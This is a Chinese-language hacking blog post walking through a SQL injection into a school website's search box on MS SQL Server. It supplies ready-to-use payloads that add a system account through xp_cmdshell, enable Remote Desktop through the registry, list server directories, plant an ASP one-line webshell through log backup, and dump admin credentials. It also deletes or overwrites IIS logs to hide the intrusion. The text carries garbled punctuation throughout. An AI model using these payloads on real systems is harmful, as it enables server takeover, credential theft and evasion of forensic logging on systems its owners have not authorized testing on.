本人是小菜，水平有限,，但是為了論壇做貢獻(xiàn),，還是自己寫點原創(chuàng)的東西出來吧。希望大?？戳藙e笑就好了,。。,。,。
=======================================================
前段時間朋友丟了一個站過來,，說是他們學(xué)校的。叫我?guī)兔z測下,。
于是看了下,。用掃描器掃了下，沒有啥可以上傳利用的,，發(fā)現(xiàn)后臺,，默認(rèn)和萬能密碼無效，
無注入點,，手工和工具試過了,，防注入，COOKIES注入也不行,。找不到程序源碼,，沒辦法分析。旁注 ,？
整站是獨立服務(wù)器,，就一個站，旁注也沒辦法,。難到要C段,？好麻煩哦。丟給群里一些大?？纯?，
都說搞不定（應(yīng)該是沒認(rèn)真看吧。）,，我大受打擊,，但是我不放棄，再去看看先,。
于是,，發(fā)現(xiàn)了一個搜索框，直覺告訴我,，這就是突破點,，果然.....

前段時間的事情了，沒辦法截圖,。
整個過程做了簡單的筆記,，和搜集了一些手工注入的代碼。湊合著看吧,。

首先,，簡單的判斷搜索型注入漏洞存在不存在的辦法是先搜索，如果出錯,，說明90%存在這個漏洞,。

a%' and 1=1-- 正常
a%' and 1=2-- 錯誤

有注入

由于網(wǎng)站過濾了 ' 等等的,。所以工具不行，要手工了,。累人啊~~~

判斷權(quán)限
a%' and (select is_member('dbo'))=1--    返回正常則 sa
a%' and (select is_member('db_owner'))=1--   返回正常則 DB
都不是那就只有一種可能啦,，public，權(quán)限貌似很小,。

也可以用另一種命令來判斷權(quán)限
a%' and 1=(Select IS_SRVROLEMEMBER('sysadmin'));-- sa
a%' and 1=(Select IS_MEMBER('db_owner'));-- DB
===========================================================================
sa 的方法,。直接建立系統(tǒng)賬號密碼。登陸3389.

命令是
a%';exec master..xp_cmdshell"net user admins 123456 /add"--

如果 'xp_cmdshell' 被關(guān)閉了,。就來開啟他,。
EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;reconfigure
最后這個為1是開啟.為0是關(guān)閉.
a%' ;EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXECsp_configure 'xp_cmdshell', 1;RECONFIGURE--

如果不開3389

下面的命令。,。

a%';exec master.dbo.xp_regwrite'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server','fDenyTSConnections','REG_DWORD',0;--

=========================================================
db 的方法

主要思路是列目錄-差異備份 還有需要庫名,。想辦法弄出來。

首先列目錄

a%' order by XX-- 自己猜 例如 12

然后

a%' and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12--

找到字符類型的,，能顯示出來的 比如 5

《MSSQL手工注入目錄查找輔助工具》這個自己百度去哈,。。,。

用 天陽的《MSSQL手工注入目錄查找輔助工具》 生成列目錄的代碼 現(xiàn)在例如生成的是C盤的

然后

a%' ;drop table t_tian6 create table t_tian6(fn nvarchar(4000),d int,f int) declare @root nvarchar(4000) set @root=0x43003A00 insert into t_tian6 exec master..xp_dirtree @root,1,1 update t_tian6 set fn=fn+char(92) where f=0 drop table t_tian6_1 create tabLe t_tian6_1(f nvarchar(4000))-- //建立插入表數(shù)據(jù)

然后

a%' ;declare @fn nvarchar(400),@f int,@r nvarchar(4000) set @r=char(9) declare cr cursor for select fn,f from t_tian6 order by f,fn open cr fetch cr into @fn,@f while @@fetch_status=0 begin set @r=@r+@fn+char(9) fetch cr into @fn,@f end close cr deallocate cr insert intO t_tian6_1(f) values(@r)-- //遠(yuǎn)程整理

然后

a%' and 1=2 union select 1,2,3,4,(select top 1 f from t_tian6_1),6,7,8,9,10,11,12--

獲取結(jié)果,。就顯示出來路徑了。

接下來就是 繼續(xù) 用 《MSSQL手工注入目錄查找輔助工具》生成列目錄的代碼,，按照上面的步驟來做,， 獲取路徑。,。,。直到找到網(wǎng)站根目錄。

然后再獲取庫名

命令：

a%' and 1=2 union select 1,2,3,4,(select db_name()),6,7,8,9,10,11,12--

and (select db_name())>0 是查詢庫名的,。這里直接在里面顯示,。 //and user>0 查看當(dāng)前用戶的。這里貌似沒什么用,，應(yīng)該不需要,，但是平時注入的時候很常用。

接下來就是 差異備份一句話木馬了,。

這里用LOG 5步備份法,。最后 如果拿到權(quán)限后，最好把 備份的東西給刪除了吧,。

代碼是

a%';alter database 庫名 set RECOVERY FULL--

a%';create table cmd (a image)--

a%';backup log 庫名 to disk = 'c:\backuplog.bak' with init--

a%';insert into cmd (a) values (0x3C256576616C20726571756573742822612229253E)--

a%';backup log 庫名 to disk = 'D:/****/a.asp'-- //路徑就填剛才獲取到的

0x3C256576616C20726571756573742822612229253E = 一句話木馬 =<%eval(request("a"))%>

庫名 是剛才查詢到的。自己填,。

然后就是用一句話上去連,。OK,。成功了。

========================================================================
public權(quán)限的又改如何拿,？

那就只好查管理員的賬號密碼 然后 登陸后臺拿webshell了,。

a%' order by XX 自己猜 例如 12

然后

a%' and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12--

猜表

a%' and 1=2 union select 1,2,3,4,5,6,7,8,9,10,11,12 from admin-- // 猜他是admin 返回正常則有,不正常的話，就試其他的比如：manage user 等等

a%' and 1=2 union select 1,2,3,4,username,password,7,8,9,10,11,12 from admin--

猜賬號密碼

2個字段 一個 username 一個 password ,。返回正常則 會顯示管理員賬號密碼的,。
不對的話，就試試別的字段,。

然后就是登陸后臺,，拿webshell了。

======================================================================================
清除日志：

刪除：
a%';exec master..xp_cmdshell"del C:\winnt\system32\logfiles\W3SVC1\ex090127.log"--

覆蓋：(推薦)
a%';exec master..xp_cmdshell"copy C:\winnt\system32\logfiles\W3SVC1\ex090201.log C:\winnt\system32\logfiles\W3SVC1\ex100201.log"--

按照系統(tǒng)的不同而自己改路徑,。
======================================================================================
備注：
如果在搜索框內(nèi)字?jǐn)?shù)被限制了,。就點查看源文件，找到
<input type="text" name="keyword" size=10 value="無關(guān)鍵字" maxlength="50">

把文本框內(nèi)的
maxlength值改的大一些,。
比如
<input type="text" name="keyword" size=10 value="無關(guān)鍵字" maxlength="1000000">
然后保存到本地提交,。

就不會限制到了。呵呵,。我就不信你能輸入命令超過這個數(shù),。
好像有點多余，呵呵,。
本文來源于獨自等待博客：http://www./ 原文地址：http://www./post/541.html